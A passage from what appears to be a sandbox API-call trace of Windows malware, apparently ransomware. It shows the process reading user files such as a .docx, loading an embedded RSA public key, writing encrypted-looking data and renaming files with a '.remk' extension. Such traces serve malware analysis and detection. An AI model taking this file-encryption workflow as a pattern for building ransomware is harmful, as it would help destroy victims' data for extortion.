hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c800 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.922] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xa7e2, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xa7e2, lpOverlapped=0x0) returned 1 [0234.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.922] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa7e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.923] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0234.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0234.923] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.923] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.923] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.923] CloseHandle (hObject=0x640) returned 1 [0234.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0234.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0234.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0234.926] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\MR bG63x.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\mr bg63x.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\MR bG63x.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\mr bg63x.gif.remk")) returned 1 [0234.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.927] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0234.928] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf7cd2a0, ftCreationTime.dwHighDateTime=0x1d5df8d, ftLastAccessTime.dwLowDateTime=0x7fe2c50, ftLastAccessTime.dwHighDateTime=0x1d5e304, ftLastWriteTime.dwLowDateTime=0x7fe2c50, ftLastWriteTime.dwHighDateTime=0x1d5e304, nFileSizeHigh=0x0, nFileSizeLow=0x7093, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WOsa73cE3Ci.docx", cAlternateFileName="WOSA73~1.DOC")) returned 1 [0234.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0234.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0234.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0234.929] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\WOsa73cE3Ci.docx") returned=".docx" [0234.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\WOsa73cE3Ci.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\wosa73ce3ci.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.931] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=28819) returned 1 [0234.931] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.934] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x706d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.934] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.936] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.936] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7093, lpOverlapped=0x0) returned 1 [0234.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0234.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.937] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0234.939] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.939] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.939] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.939] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.939] GetLastError () returned 0x0 [0234.939] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.939] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0234.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.939] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.939] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.939] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7090) returned 0x37c4278 [0234.940] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c800 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c848 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.940] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee988 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee970 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.942] GetCurrentThreadId () returned 0x314 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3d00 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.942] GetCurrentThreadId () returned 0x314 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0234.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9e8 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eea00 [0234.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9a0 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea00 | out: hHeap=0x630000) returned 1 